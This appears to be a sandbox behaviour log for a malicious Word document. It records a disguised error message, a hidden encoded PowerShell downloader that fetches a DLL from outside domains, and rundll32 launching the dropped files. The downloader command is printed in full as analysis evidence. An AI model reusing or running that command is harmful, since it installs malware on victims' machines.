Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....8................{.............}..v.....8......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P?......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....@................{.............}..v.....@......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....PG......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H................{.............}..v.....H......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....PO......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....P................{.............}..v.....P......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............\..j.....Gb...............{.............}..v....PW......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....X................{.............}..v.....X......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............\..j.....Gb...............{.............}..v....P_......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....`................{.............}..v.....`......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............\..j.....Gb...............{.............}..v....Pg......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....h................{.............}..v.....h......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............\..j.....Gb...............{.............}..v....Po......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....p................{.............}..v.....p......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............\..j.....Gb...............{.............}..v....Pw......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....x................{.............}..v.....x......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.T.............XDb.....<.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....`.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....0.......0.T.....................r.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v....h.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......\..j......................{.............}..v............0.T.............XDb.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v....0.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................<}.j......................{.............}..v............0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................<}.j....E.n...............{.............}..v....x>......0.T...............b.............P...............	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString

Source: ARCH_25_012021.doc	Virustotal: Detection: 16%
Source: ARCH_25_012021.doc	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL	Jump to behavior
